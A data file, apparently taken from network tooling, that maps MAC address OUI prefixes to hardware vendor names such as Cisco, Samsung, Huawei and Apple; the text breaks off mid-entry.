+001EA3 Nokia Danmark A/S +001D98 Nokia Danmark A/S +00119F Nokia Danmark A/S +18A6F7 TP-Link Technologies +246968 TP-Link Technologies +8CA2FD Starry +AC61EA Apple +38B54D Apple +90A62F Naver +F4ED5F Shenzhen KTC Technology Group +9476B7 Samsung Electronics +8C1ABF Samsung Electronics +B47443 Samsung Electronics +000BA2 Sumitomo Electric Industries +30CBF8 Samsung Electronics +40D357 Ison Technology +A4F1E8 Apple +00351A Cisco Systems +00A0B8 NetApp +9CD48B Innolux Technology Europe BV +545AA6 Espressif +DCE838 CK Telecom (Shenzhen) Limited +00CCFC Cisco Systems +2C9662 Invenit BV +DC2DCB Beijing Unis HengYue Technology +3810D5 AVM Audiovisuelles Marketing und Computersysteme GmbH +1C5F2B D-Link International +D8803C Anhui Huami Information Technology Company Limited +703C03 RadiAnt +583277 Reliance Communications +CCD3E2 Jiangsu Yinhe Electronics +182195 Samsung Electronics +A88195 Samsung Electronics +88ADD2 Samsung Electronics +008E73 Cisco Systems +B805AB zte +9C52F8 Huawei Technologies +900325 Huawei Technologies +DC094C Huawei Technologies +DCEE06 Huawei Technologies +AC44F2 Yamaha +508965 Shenzhen Mercury Communication Technologies +808C97 Kaonmedia +30B49E TP-Link Technologies +349971 Quanta Storage +24615A China Mobile Group Device +A0043E Parker Hannifin Manufacturing Germany GmbH & KG +5CC7D7 Azroad Technology Company Limited +001706 Techfaithwireless Communication Technology Limited. +30F6B9 Ecocentric Energy +004268 Cisco Systems +00BD82 Shenzhen Youhua Technology +603ECA Cambridge Medical Robotics +54489C Cdoubles Electronics +54BEF7 Pegatron +0C54A5 Pegatron +202564 Pegatron +600292 Pegatron +84002D Pegatron +8019FE JianLing Technology +58605F Huawei Technologies +001188 Enterasys +1078D2 Elitegroup Computer Systems +001E90 Elitegroup Computer Systems +002465 Elentec +001CD7 Harman/Becker Automotive Systems GmbH +0016EC Elitegroup Computer Systems +000D87 Elitegroup Computer Systems +000AE6 Elitegroup Computer Systems +945089 SimonsVoss Technologies GmbH +0016FA ECI Telecom +003A7D Cisco Systems +844076 Drivenets +0010E0 Oracle +00144F Oracle +E80959 Guoguang Electric +0090AE Italtel S.p.a/rf-up-i +001E33 Inventec +001A29 Johnson Outdoors Marine Electronics d/b/a Minnkota +001F09 Jastec +D0A4B1 Sonifex +001DB5 Juniper Networks +00239C Juniper Networks +80711F Juniper Networks +28C0DA Juniper Networks +BCAD28 Hangzhou Hikvision Digital Technology +28F366 Shenzhen Bilian electronic +8828B3 Huawei Technologies +C4F081 Huawei Technologies +801382 Huawei Technologies +648788 Juniper Networks +A8D0E5 Juniper Networks +0881F4 Juniper Networks +6C3B6B Routerboard.com +7C738B Cocoon Alarm +000FE2 Hangzhou H3C Technologies, Limited +002389 Hangzhou H3C Technologies, Limited +3822D6 Hangzhou H3C Technologies, Limited +80F62E Hangzhou H3C Technologies, Limited +5866BA Hangzhou H3C Technologies, Limited +0CDA41 Hangzhou H3C Technologies, Limited +586AB1 Hangzhou H3C Technologies, Limited +741F4A Hangzhou H3C Technologies, Limited +3CCB7C TCT mobile +F03404 TCT mobile +D8E56D TCT mobile +90C1C6 Apple +70A2B3 Apple +4C57CA Apple +68FB7E Apple +442C05 Ampak Technology +10BEF5 D-Link International +7C6AF3 Integrated Device Technology (Malaysia) Sdn. Bhd. +C41CFF Vizio +444450 OttoQ +FC55DC Baltic Latvian Universal Electronics +941882 Hewlett Packard Enterprise +000EB6 Riverbed Technology +D0FCCC Samsung Electronics +045604 Gionee Communication Equipment +10BD55 Q-Lab +8C6D50 Shenzhen MTC +3C6816 VXi +C0A1A2 MarqMetrix +00F663 Cisco Systems +341290 Treeview +F40A4A Indusnet Communication Technology +E8377A ZyXEL Communications +04BF6D ZyXEL Communications +00A0C5 ZyXEL Communications +107BEF ZyXEL Communications +C0C976 Shenzhen Tinno Mobile Technology +14C913 LG Electronics +680715 Intel Corporate +A09E1A Polar Electro Oy +D0B2C4 Technicolor CH USA +FC94E3 Technicolor CH USA +FC528D Technicolor CH USA +D84A87 OI Electric +BC307D Wistron Neweb +5410EC Microchip Technology +309BAD BBK Educational Electronics +001BB1 Wistron Neweb +000B6B Wistron Neweb +AC9B0A Sony +4813F3 BBK Educational Electronics +74B472 Ciesse +483C0C Huawei Technologies +4C6641 Samsung Electro-mechanics(thailand) +C8755B Quantify Technology +1C57D8 Kraftway PLC +002397 Westell Technologies +00600F Westell Technologies +00E0DD Zenith Electronics +50CE75 Measy Electronics +047D7B Quanta Computer +88124E Qualcomm +649C81 Qualcomm +001B32 QLogic +001E21 Qisda +0017CA Qisda +0014D1 Trendnet +001C7E Toshiba +001C14 VMware +90A210 United Telecoms +E02A82 Universal Global Scientific Industrial +001641 Universal Global Scientific Industrial +4C334E Hightech +001315 Sony Interactive Entertainment +001FA7 Sony Interactive Entertainment +A8E3EE Sony Interactive Entertainment +709E29 Sony Interactive Entertainment +FC0FE6 Sony Interactive Entertainment +0050C2 Ieee Registration Authority +CC79CF Shenzhen Rf-link Technology +141FBA Ieee Registration Authority +800A80 Ieee Registration Authority +A44F29 Ieee Registration Authority +5CF286 Ieee Registration Authority +64FB81 Ieee Registration Authority +E4956E Ieee Registration Authority +C88ED1 Ieee Registration Authority +78C2C0 Ieee Registration Authority +885D90 Ieee Registration Authority +3C39E7 Ieee Registration Authority +A0BB3E Ieee Registration Authority +6CB9C5 Delta Networks +7CFC3C Visteon +58BC8F Cognitive Systems +54DC1D Yulong Computer Telecommunication Scientific (Shenzhen) +3CBDD8 LG Electronics +4888CA Motorola (Wuhan) Mobility Technologies Communication +74B57E zte +540955 zte +88A6C6 Sagemcom Broadband SAS +000F59 Phonak AG +000EF4 Kasda Networks +000AEB TP-Link Technologies +2C3731 Shenzhen Yifang Digital Technology +001FBA Boyoung Tech +C4047B Shenzhen Youhua Technology +A42940 Shenzhen Youhua Technology +3C3300 Shenzhen Bilian electronic +20F41B Shenzhen Bilian electronic +3092F6 Shanghai Sunmon Communication Technogy +7C2064 Alcatel-Lucent IPD +E4A1E6 Alcatel-Lucent Shanghai Bell +000B34 ShangHai Broadband TechnologiesLTD +38256B Microsoft Mobile Oy +203AEF Sivantos GmbH +001E40 Shanghai DareGlobal Technologies +80A1D7 Shanghai DareGlobal Technologies +D8FB68 Cloud Corner +C09134 ProCurve Networking by HP +4CB21C Maxphotonics +D8C46A Murata Manufacturing +849866 Samsung Electronics +002162 Nortel Networks +000F06 Nortel Networks +000342 Nortel Networks +00159B Nortel Networks +00140E Nortel Networks +0016CA Nortel Networks +001969 Nortel Networks +0019E1 Nortel Networks +001A8F Nortel Networks +E89309 Samsung Electronics +001988 Wi2Wi +4CFACA Cambridge Industries(Group) +2C9D1E Huawei Technologies +C88D83 Huawei Technologies +080087 Xyplex +00B0B3 Xstreamis PLC +14825B Hefei Radio Communication Technology +00562B Cisco Systems +24F57E HWH +943DC9 Asahi Net +080028 Texas Instruments +0012D2 Texas Instruments +D494A1 Texas Instruments +78C5E5 Texas Instruments +847E40 Texas Instruments +001832 Texas Instruments +90D7EB Texas Instruments +BC0DA5 Texas Instruments +7C8EE4 Texas Instruments +D8543A Texas Instruments +884AEA Texas Instruments +B09122 Texas Instruments +209148 Texas Instruments +A0F6FD Texas Instruments +D4F513 Texas Instruments +0017EC Texas Instruments +0017E5 Texas Instruments +C83E99 Texas Instruments +8C8B83 Texas Instruments +D0B5C2 Texas Instruments +84EB18 Texas Instruments +6CECEB Texas Instruments +985DAD Texas Instruments +E8EB11 Texas Instruments +D43639 Texas Instruments +A043DB Sitael +E4BEED Netcore Technology +84EF18 Intel Corporate +84C1C1 Juniper Networks +A8A648 Qingdao Hisense Communications +305890 Frontier Silicon +002261 Frontier Silicon +049F81 NetScout Systems +00808C NetScout Systems +C4F5A5 Kumalift +98F058 Lynxspring +24E43F Wenzhou Kunmei Communication Technology +240AC4 Espressif +E4C1F1 Shenzhen Spotmau Information Technoligy +240DC2 TCT mobile +14DDE5 Mpmkvvcl +0016DB Samsung Electronics +5C3C27 Samsung Electronics +10D542 Samsung Electronics +A0821F Samsung Electronics +C45006 Samsung Electronics +88329B Samsung Electro-mechanics(thailand) +BC8CCD Samsung Electro-mechanics(thailand) +400E85 Samsung Electro-mechanics(thailand) +EC9BF3 Samsung Electro-mechanics(thailand) +F8042E Samsung Electro-mechanics(thailand) +843838 Samsung Electro-mechanics(thailand) +54880E Samsung Electro-mechanics(thailand) +BC79AD Samsung Electronics +30D6C9 Samsung Electronics +B0DF3A Samsung Electronics +805719 Samsung Electronics +78A873 Samsung Electronics +041BBA Samsung Electronics +08FD0E Samsung Electronics +08D42B Samsung Electronics +00E3B2 Samsung Electronics +C81479 Samsung Electronics +F0728C Samsung Electronics +94350A Samsung Electronics +001FCD Samsung Electronics +D0DFC7 Samsung Electronics +1C62B8 Samsung Electronics +18E2C2 Samsung Electronics +F04347 Huawei Technologies +9CB2B2 Huawei Technologies +84BE52 Huawei Technologies +001A8A Samsung Electronics +002567 Samsung Electronics +A8F274 Samsung Electronics +B07870 Wi-next +001599 Samsung Electronics +0012FB Samsung Electronics +7CF854 Samsung Electronics +8CC8CD Samsung Electronics +E81132 Samsung Electronics +A02195 Samsung Electronics +840B2D Samsung Electro Mechanics +000278 Samsung Electro Mechanics +F07BCB Hon Hai Precision Ind. +4C0F6E Hon Hai Precision Ind. +5C6D20 Hon Hai Precision Ind. +90004E Hon Hai Precision Ind. +C0F8DA Hon Hai Precision Ind. +485AB6 Hon Hai Precision Ind. +083E8E Hon Hai Precision Ind. +F4B7E2 Hon Hai Precision Ind. +4437E6 Hon Hai Precision Ind. +0016CF Hon Hai Precision Ind. +001C25 Hon Hai Precision Ind. +C48E8F Hon Hai Precision Ind. +184F32 Hon Hai Precision Ind. +441CA8 Hon Hai Precision Ind. +A8474A Hon Hai Precision Ind. +08EDB9 Hon Hai Precision Ind. +7CE9D3 Hon Hai Precision Ind. +E4D53D Hon Hai Precision Ind. +C417FE Hon Hai Precision Ind. +38B1DB Hon Hai Precision Ind. +00234D Hon Hai Precision Ind. +00234E Hon Hai Precision Ind. +00265E Hon Hai Precision Ind. +541379 Hon Hai Precision Ind. +1008B1 Hon Hai Precision Ind. +701DC4 NorthStar Battery Company +801844 Dell +C80E14 AVM Audiovisuelles Marketing und Computersysteme GmbH +E0686D Raybased AB +98B039 Nokia +84262B Nokia +94E98C Nokia +E48184 Nokia +BC8D0E Nokia +B0754D Nokia +BC6B4D Nokia +A47B2C Nokia +00D0F6 Nokia +48F8E1 Nokia +002341 Vanderbilt International (SWE) AB +981333 zte +8C71F8 Samsung Electronics +04180F Samsung Electronics +9463D1 Samsung Electronics +0CDFA4 Samsung Electronics +CC051B Samsung Electronics +68EBAE Samsung Electronics +60D0A9 Samsung Electronics +60A10A Samsung Electronics +A07591 Samsung Electronics +D814D6 Sure System +646184 Velux +001FCC Samsung Electronics +EC01E2 Foxconn Interconnect Technology +00F22C Shanghai B-star Technology +D03DC3 AQ +FCCAC4 LifeHealth +04BA36 Li Seng Technology +4409B8 Salcomp (Shenzhen) +78888A CDR Sp. z o.o. Sp. k. +F09838 Huawei Technologies +18DED7 Huawei Technologies +EC107B Samsung Electronics +A01081 Samsung Electronics +001EAE Continental Automotive Systems +9CF48E Apple +FCD848 Apple +8048A5 Sichuan Tianyi Comheart Telecomco. +645D92 Sichuan Tianyi Comheart Telecomco. +D44165 Sichuan Tianyi Comheart Telecomco. +643AB1 Sichuan Tianyi Comheart Telecomco. +AC64DD Ieee Registration Authority +00010D Teledyne Dalsa +F09FC2 Ubiquiti Networks +0418D6 Ubiquiti Networks +44D9E7 Ubiquiti Networks +48DA96 Eddy Smart Home Solutions +503AA0 Shenzhen Mercury Communication Technologies +C025E9 TP-Link Technologies +50B363 Digitron da Amazonia S/A +94B819 Nokia +A4D9A4 neXus ID Solutions AB +484D7E Dell +F4B549 Xiamen Yeastar Information Technology +28EED3 Shenzhen Super D Technology +18F292 Shannon Systems +3C3F51 2crsi +F4F524 Motorola Mobility, a Lenovo Company +50584F waytotec +00A2EE Cisco Systems +98E476 Zentan +18F76B Zhejiang Winsight Technology +00609B AstroNova +B87CF2 Aerohive Networks +C413E2 Aerohive Networks +F09CE9 Aerohive Networks +CCC5EF Co-Comm Servicios Telecomunicaciones S.L. +5C6B4F Hello +C09C04 Shaanxi GuoLian Digital TV Technology +D0F73B Helmut Mauell GmbH Werk Weida +D00AAB Yokogawa Digital Computer +AC233F Shenzhen Minew Technologies +000E58 Sonos +E0508B Zhejiang Dahua Technology +2C6FC9 Hon Hai Precision Ind. +9C99A0 Xiaomi Communications +185936 Xiaomi Communications +98FAE3 Xiaomi Communications +640980 Xiaomi Communications +8CBEBE Xiaomi Communications +F8A45F Xiaomi Communications +508A0F Shenzhen Fise Technology Holding +E4B005 Beijing Iqiyi Science & Technology +C83B45 JRI +1CEEC9 Elo touch solutions +4CB81C SAM Electronics GmbH +2CDCAD Wistron Neweb +704D7B Asustek Computer +7CF95C U.I. Lapp GmbH +743A65 NEC +C80CC8 Huawei Technologies +0425C5 Huawei Technologies +A4EE57 Seiko Epson +480033 Technicolor CH USA +14B31F Dell +BC8385 Microsoft +A03D6F Cisco Systems +40605A Hawkeye Tech +C0210D Shenzhen Rf-link Technology +000678 D&M Holdings +886B44 Sunnovo International Limited +A408F5 Sagemcom Broadband SAS +54FA96 Nokia +1840A4 Shenzhen Trylong Smart Science and Technology +9C50EE Cambridge Industries(Group) +F015B9 PlayFusion Limited +70700D Apple +24A7DC BSkyB +2CD02D Cisco Systems +3478D7 Gionee Communication Equipment +1CEFCE bebro electronic GmbH +CCB8A8 Ampak Technology +5CFF35 Wistron +78F29E Pegatron +00D0B2 Xiotech +000AE4 Wistron +00262D Wistron +908674 Sichuan Tianyi Comheart Telecomco. +F49651 Nakayo +681FD8 Siemens Industry +C43018 MCS Logic +FCB58A Wapice +DCEFCA Murata Manufacturing +E865D4 Tenda Technology,Ltd.Dongguan branch +285261 Cisco Systems +286F7F Cisco Systems +089E08 Google +00014F Adtran +045D4B Sony +A80CCA Shenzhen Sundray Technologies Company Limited +94652D OnePlus Technology (Shenzhen) +F8A34F zte +845A81 ffly4u +347877 O-Net Communications (Shenzhen) Limited +F483E1 Shanghai Clouder Semiconductor +8CC8F4 Ieee Registration Authority +08CCA7 Cisco Systems +7868F7 YSTen Technology +704F57 TP-Link Technologies +3407FB Ericsson AB +6CB4A7 Landauer +F8A5C5 Cisco Systems +A49B13 Digital Check +542F8A Tellescom Industria E Comercio EM Telecomunicacao +A0A33B Huawei Technologies +6854C1 ColorTokens +DCC64B Huawei Technologies +043389 Huawei Technologies +887873 Intel Corporate +6C750D WiFiSONG +346E9D Ericsson AB +54E1AD Lcfc(hefei) Electronics Technology +E45D51 SFR +B816DB Chant Sincere +D461FE Hangzhou H3C Technologies, Limited +94F551 Cadi Scientific Pte +BC452E Knowledge Development for POF S.L. +E8D11B Askey Computer +44032C Intel Corporate +14987D Technicolor CH USA +D4CF37 Symbolic IO +283F69 Sony Mobile Communications AB +E048AF Premietech Limited +2C3311 Cisco Systems +F0A225 Private +F0D2F1 Amazon Technologies +8871E5 Amazon Technologies +7C5049 Apple +503A7D AlphaTech PLC Intl +9CFCD1 Aetheris Technology (Shanghai) +949901 Shenzhen Yitoa Digital Appliance +E89E0C Private +10954B Megabyte +D8A105 Syslane +C4B9CD Cisco Systems +3C0518 Samsung Electronics +900628 Samsung Electronics +C4700B Guangzhou Chip Technologies +D4AE05 Samsung Electronics +98DDEA Infinix mobility limited +04946B Tecno Mobile Limited +A04C5B Shenzhen Tinno Mobile Technology +989E63 Apple +DCA904 Apple +48A195 Apple +6CAB31 Apple +503237 Apple +D4619D Apple +B0481A Apple +000889 Echostar Technologies +2C029F 3ALogics +58D9D5 Tenda Technology,Ltd.Dongguan branch +60E78A Unisem +6C5976 Shanghai Tricheer Technology +F4A739 Juniper Networks +2CFAA2 Alcatel-Lucent Enterprise +00D095 Alcatel-Lucent Enterprise +4095BD NTmore.Co. +2CABEB Cisco Systems +BC66DE Shadow Creator Information Technology +A0086F Huawei Technologies +C4FF1F Huawei Technologies +7C7B8B Control Concepts +C40BCB Xiaomi Communications +D8C06A Hunantv.com Interactive Entertainment Media +9C32A9 Sichuan Tianyi Comheart Telecomco. +601466 zte +30D386 zte +900E83 Monico Monitoring +BC3AEA Guangdong Oppo Mobile Telecommunications +8C0EE3 Guangdong Oppo Mobile Telecommunications +6C5C14 Guangdong Oppo Mobile Telecommunications +E8BBA8 Guangdong Oppo Mobile Telecommunications +F894C2 Intel Corporate +7CB960 Shanghai X-Cheng telecom +A8D579 Beijing Chushang Science and Technology +28C63F Intel Corporate +600837 ivvi Scientific(Nanchang)Co.Ltd +D860B3 Guangdong Global Electronic TechnologyLTD +3C9509 Liteon Technology +3CA308 Texas Instruments +44B412 Sius AG +60D7E3 Ieee Registration Authority +00F82C Cisco Systems +00C1B1 Cisco Systems +D0F88C Motorola (Wuhan) Mobility Technologies Communication +2CB115 Integrated Device Technology (Malaysia) Sdn. Bhd. +78ABBB Samsung Electronics +1816C9 Samsung Electronics +FC8F90 Samsung Electronics +244B03 Samsung Electronics +988389 Samsung Electronics +14BB6E Samsung Electronics +1C3ADE Samsung Electronics +F83F51 Samsung Electronics +D8E0E1 Samsung Electronics +50FF20 Keenetic Limited +ECF342 Guangdong Oppo Mobile Telecommunications +D4C1C8 zte +EC237B zte +881544 Cisco Meraki +F44156 Arrikto +D4258B Intel Corporate +B4F2E8 Arris Group +D0E54D Arris Group +7085C6 Arris Group +44AAF5 Arris Group +00E18C Intel Corporate +005094 Arris Group +FC8E7E Arris Group +5856E8 Arris Group +CCA462 Arris Group +903EAB Arris Group +14CFE2 Arris Group +900DCB Arris Group +207355 Arris Group +C83FB4 Arris Group +E0B70A Arris Group +78719C Arris Group +D40598 Arris Group +946269 Arris Group +48D343 Arris Group +E02202 Arris Group +2C1DB8 Arris Group +E45740 Arris Group +94CCB9 Arris Group +40B7F3 Arris Group +20E564 Arris Group +90B134 Arris Group +3C438E Arris Group +E86D52 Arris Group +0015D0 Arris Group +001DCE Arris Group +001DD4 Arris Group +001DCD Arris Group +8C7F3B Arris Group +D039B3 Arris Group +0000C5 Arris Group +3C36E4 Arris Group +00ACE0 Arris Group +384C90 Arris Group +D40AA9 Arris Group +0023A3 Arris Group +64ED57 Arris Group +0023EE Arris Group +002143 Arris Group +0023AF Arris Group +001ADE Arris Group +001E46 Arris Group +0018C0 Arris Group +001A66 Arris Group +00192C Arris Group +00159A Arris Group +00080E Arris Group +0050E3 Arris Group +0025F1 Arris Group +F87B7A Arris Group +88D7F6 Asustek Computer +145E45 Kaleao Limited +1C1FD4 LifeBEAM Technologies +88BD78 Flaircomm Microelectronics +5092B9 Samsung Electronics +B4BFF6 Samsung Electronics +C8D7B0 Samsung Electronics +60720B BLU Products +F4A997 Canon +3C4CD0 Ceragon Networks +B04E26 TP-Link Technologies +FC06ED M2Motive Technology +54C9DF Fn-link Technology Limited +30C3D9 Alps Electric +FC4D8C Shenzhen Pante Electronics Technology +B01F29 Helvetia +8C147D Ieee Registration Authority +28070D Guangzhou Winsound Information Technology +7038EE Avaya +2CF4C5 Avaya +C8F406 Avaya +3CB15B Avaya +FCA841 Avaya +50CD22 Avaya +10CDAE Avaya +B0ADAA Avaya +00549F Avaya +6049C1 Avaya +E0D848 Dell +145BE1 nyantec UG (haftungsbeschrnkt) +00187D Armorlink .Ltd +F42981 vivo Mobile Communication +3CA348 vivo Mobile Communication +28FAA0 vivo Mobile Communication +3CB6B7 vivo Mobile Communication +A40E2B Facebook +5419C8 vivo Mobile Communication +1C4D70 Intel Corporate +A0C5F2 Ieee Registration Authority +F4B7B3 vivo Mobile Communication +E43A6E Shenzhen Zeroone Technology +60DA83 Hangzhou H3C Technologies, Limited +2C5731 Wingtech Group (HongKongLimited +F46BEF Sagemcom Broadband SAS +085114 Qingdao Topscomm Communication +D05A00 Technicolor CH USA +70F11C Shenzhen Ogemray Technology +14144B Ruijie Networks +70DF2F Cisco Systems +001753 nFore Technology +58C583 Itel Mobile Limited +6447E0 Feitian Technologies +F88A3C Ieee Registration Authority +E86D65 Audio Mobil Elektronik Gmbh +E86FF2 Actiontec Electronics +00016D CarrierComm +70DEF9 FAI WAH International (hong Kong) Limited +24C9A1 Ruckus Wireless +F0B052 Ruckus Wireless +84183A Ruckus Wireless +6CAAB3 Ruckus Wireless +001F41 Ruckus Wireless +C08ADE Ruckus Wireless +50A733 Ruckus Wireless +C4017C Ruckus Wireless +245880 Vizeo +7CBACC Ieee Registration Authority +000726 Shenzhen Gongjin Electronics +BC9680 Shenzhen Gongjin Electronics +1CA532 Shenzhen Gongjin Electronics +0000FE Annapolis Micro Systems +188090 Cisco Systems +BC024A HMD Global Oy +90A365 HMD Global Oy +C444A0 Cisco Systems +F83441 Intel Corporate +5C0339 Huawei Technologies +044F4C Huawei Technologies +1C151F Huawei Technologies +544E45 Private +DCEB53 Wuhan QianXiao Elecronic Technology +94E36D Texas Instruments +74819A PT. Hartono Istana Teknologi +0835B2 CoreEdge Networks +6C38A1 Ubee Interactive, Limited +B40F3B Tenda Technology,Ltd.Dongguan branch +1062D0 Technicolor CH USA +7802B1 Cisco Systems +94D9B3 TP-Link Technologies +309935 zte +409BCD D-Link International +005C86 Shenzhen Fast Technologies +1CAB34 New H3C Technologies +5C0979 Huawei Technologies +002EC7 Huawei Technologies +488EEF Huawei Technologies +2C3033 Netgear +002438 Brocade Communications Systems +001BED Brocade Communications Systems +0012F2 Brocade Communications Systems +28C68E Netgear +04A151 Netgear +A42B8C Netgear +A00460 Netgear +9C3DCF Netgear +00146C Netgear +2CB05D Netgear +504A6E Netgear +2C4D79 Weifang GoerTek Technology +841766 Weifang GoerTek Technology +ACFD93 Weifang GoerTek Technology +A45385 Weifang GoerTek Technology +741C27 Itel Mobile Limited +111111 Private +FCC233 Private +2830AC Frontiir +9050CA Hitron Technologies. +0004BF VersaLogic +64B5C6 Nintendo +D8B12A Panasonic Mobile Communications +EC0441 Shenzhen Tigo Semiconductor +BC88C3 Ningbo Dooya Mechanic & Electronic Technology +A41115 Robert Bosch Engineering and Business Solutions pvt. +A8BE27 Apple +B8634D Apple +6C96CF Apple +3035AD Apple +2CD2E7 Nokia +681F40 Blu Wireless Technology +48C58D Lear GmbH +90ADF7 vivo Mobile Communication +982D68 Samsung Electronics +5CEA1D Hon Hai Precision Ind. +ECD09F Xiaomi Communications +00152A Nokia +A43412 Thales Alenia Space +9C65EE Dasan Network Solutions +0017C8 Kyocera Display +002294 Kyocera +80739F Kyocera +3889DC Opticon Sensors Europe +38E2DD zte +74E5F9 Intel Corporate +080070 Mitsubishi Precision +3C11B2 Fraunhofer FIT +DCF090 Nubia Technology +DC6AEA Infinix mobility limited +8CE38E Toshiba Memory +D8A01D Espressif +0025DF Private +74EAC8 New H3C Technologies +A434F1 Texas Instruments +C4F312 Texas Instruments +44EAD8 Texas Instruments +A0D86F Private +3890A5 Cisco Systems +8C5F48 Continental Intelligent Transportation Systems +4C1365 Emplus Technologies +104400 Huawei Technologies +2054FA Huawei Technologies +989C57 Huawei Technologies +E4A7C5 Huawei Technologies +88DA1A Redpine Signals +14CF8D Ohsung +8CE748 Private +48D35D Private +F4F5DB Xiaomi Communications +38A6CE BSkyB +1077B0 Fiberhome Telecommunication Technologies +1C398A Fiberhome Telecommunication Technologies +CC0677 Fiberhome Telecommunication Technologies +C84029 Fiberhome Telecommunication Technologies +28BF89 Fiberhome Telecommunication Technologies +F4573E Fiberhome Telecommunication Technologies +88947E Fiberhome Telecommunication Technologies +B0E2E5 Fiberhome Telecommunication Technologies +E446DA Xiaomi Communications +500F80 Cisco Systems +B430C0 York Instruments +F0BD2E H+S Polatis +F0AB54 Mitsumi Electric +C449BB Mitsumi Electric +C468D0 VTech Telecommunications +48D6D5 Google +842C80 Sichuan Changhong Electric +0C1C20 Kakao +182D98 Jinwoo Industrial system +40498A Synapticon GmbH +D80831 Samsung Electronics +24F27F Hewlett Packard Enterprise +00B69F Latch +A88200 Hisense Electric +F449EF Emstone +2856C1 Harman International +68A682 Shenzhen Youhua Technology +406A8E Hangzhou Puwell OE Tech +001F1F Edimax Technology +DC5583 Guangdong Oppo Mobile Telecommunications +9CE33F Apple +F0989D Apple +ACE4B5 Apple +E42B34 Apple +1C36BB Apple +3C2EFF Apple +547A52 CTE International srl +248BE0 Sichuan Tianyi Comheart Telecomco. +ECB5FA Philips Lighting BV +ACA667 Electronic Systems Protection +006048 Dell EMC +7CC95A Dell EMC +649A08 Shenzhen SuperElectron Technology +CC2DE0 Routerboard.com +ECFABC Espressif +B0FC36 CyberTAN Technology +7846C4 Daehap Hyper-tech +58C935 Chiun Mai Communication Systems +28C13C Hon Hai Precision Ind. +0C5203 AGM Group Limited +3C18A0 Luxshare Precision Industry Company Limited +BCF292 Plantronics +F895C7 LG Electronics (Mobile Communications) +C4438F LG Electronics (Mobile Communications) +A816B2 LG Electronics (Mobile Communications) +E892A4 LG Electronics (Mobile Communications) +700514 LG Electronics (Mobile Communications) +6CD68A LG Electronics (Mobile Communications) +2021A5 LG Electronics (Mobile Communications) +0C4885 LG Electronics (Mobile Communications) +DC0B34 LG Electronics (Mobile Communications) +2C598A LG Electronics (Mobile Communications) +88C9D0 LG Electronics (Mobile Communications) +2C54CF LG Electronics (Mobile Communications) +001FE3 LG Electronics (Mobile Communications) +0026E2 LG Electronics (Mobile Communications) +001E75 LG Electronics (Mobile Communications) +AC0D1B LG Electronics (Mobile Communications) +60E3AC LG Electronics (Mobile Communications) +547DCD Texas Instruments +1CDF52 Texas Instruments +18F0E4 Xiaomi Communications +803BF6 Look Easy International Limited +4C5262 Fujitsu Technology Solutions GmbH +3873EA Ieee Registration Authority +0C6F9C Shaw Communications +1801E3 Bittium Wireless +C0AC54 Sagemcom Broadband SAS +40F201 Sagemcom Broadband SAS +C891F9 Sagemcom Broadband SAS +4CFF12 Fuze Entertainment +0059AC KPN. +AC9A22 NXP Semiconductors +006037 NXP Semiconductors +546009 Google +A47733 Google +94EB2C Google +28BC56 EMAC +287CDB Hefei Toycloud Technology +D0B33F Shenzhen Tinno Mobile Technology +00738D Shenzhen Tinno Mobile Technology +A8CA7B Huawei Technologies +ACCF85 Huawei Technologies +0CD746 Apple +440010 Apple +2435CC Zhongshan Scinan Internet of Things +2C27D7 Hewlett Packard +000F3D D-Link +001195 D-Link +0015E9 D-Link +0CFD37 Suse Linux Gmbh +2CFF65 Oki Electric Industry +001CF0 D-Link +00265A D-Link +ACF1DF D-Link International +FC7516 D-Link International +7C18CD E-tron +3897D6 Hangzhou H3C Technologies, Limited +C8478C Beken +E498D6 Apple +606944 Apple +8896B6 Global Fire Equipment +188796 HTC +AC2A0C CSR Zhuzhou Institute +F4CA24 FreeBit +000A57 Hewlett Packard +643150 Hewlett Packard +002376 HTC +0007E9 Intel +B46D83 Intel Corporate +E4FAFD Intel Corporate +DC5360 Intel Corporate +780CB8 Intel Corporate +484520 Intel Corporate +004026 Buffalo.inc +0002A5 Hewlett Packard +A02BB8 Hewlett Packard +6CC217 Hewlett Packard +3863BB Hewlett Packard +CC3E5F Hewlett Packard +7446A0 Hewlett Packard +443192 Hewlett Packard +FC15B4 Hewlett Packard +EC9A74 Hewlett Packard +80C16E Hewlett Packard +D07E28 Hewlett Packard +7403BD Buffalo.inc +101F74 Hewlett Packard +001A4B Hewlett Packard +001F29 Hewlett Packard +00215A Hewlett Packard +000F61 Hewlett Packard +001185 Hewlett Packard +001279 Hewlett Packard +001708 Hewlett Packard +2832C5 Humax +EC4D47 Huawei Technologies +88CF98 Huawei Technologies +6CE3B6 Nera Telecommunications +942CB3 Humax +0452F3 Apple +241EEB Apple +F431C3 Apple +C87B5B zte +98F537 zte +001E73 zte +0019C6 zte +0015EB zte +F0EBD0 Shanghai Feixun Communication +D8490B Huawei Technologies +888603 Huawei Technologies +F8E811 Huawei Technologies +E09796 Huawei Technologies +CCCC81 Huawei Technologies +101B54 Huawei Technologies +7054F5 Huawei Technologies +D07AB5 Huawei Technologies +C40528 Huawei Technologies +3CDFBD Huawei Technologies +14B968 Huawei Technologies +80717A Huawei Technologies +F49FF3 Huawei Technologies +784B87 Murata Manufacturing +28A183 Alps Electric +5CF8A1 Murata Manufacturing +6021C0 Murata Manufacturing +84DBAC Huawei Technologies +C07009 Huawei Technologies +E0191D Huawei Technologies +B8BC1B Huawei Technologies +241FA0 Huawei Technologies +50A72B Huawei Technologies +C85195 Huawei Technologies +00F81C Huawei Technologies +F4559C Huawei Technologies +283CE4 Huawei Technologies +64A5C3 Apple +001D0F TP-Link Technologies +5C63BF TP-Link Technologies +B0487A TP-Link Technologies +388345 TP-Link Technologies +14E6E4 TP-Link Technologies +647002 TP-Link Technologies +6466B3 TP-Link Technologies +6CE873 TP-Link Technologies +08E84F Huawei Technologies +04BD70 Huawei Technologies +18C58A Huawei Technologies +04C06F Huawei Technologies +5C4CA9 Huawei Technologies +4C5499 Huawei Technologies +00259E Huawei Technologies +001882 Huawei Technologies +00906F Cisco Systems +0090A6 Cisco Systems +0090AB Cisco Systems +7426AC Cisco Systems +B000B4 Cisco Systems +2834A2 Cisco Systems +641225 Cisco Systems +544A00 Cisco Systems +5067AE Cisco Systems +BC16F5 Cisco Systems +6899CD Cisco Systems +F44E05 Cisco Systems +0CF5A4 Cisco Systems +5CFC66 Cisco Systems +D0A5A6 Cisco Systems +3C5EC3 Cisco Systems +64F69D Cisco Systems +74A2E6 Cisco Systems +204C9E Cisco Systems +00112F Asustek Computer +0011D8 Asustek Computer +001731 Asustek Computer +0018F3 Asustek Computer +485B39 Asustek Computer +F46D04 Asustek Computer +3085A9 Asustek Computer +00900C 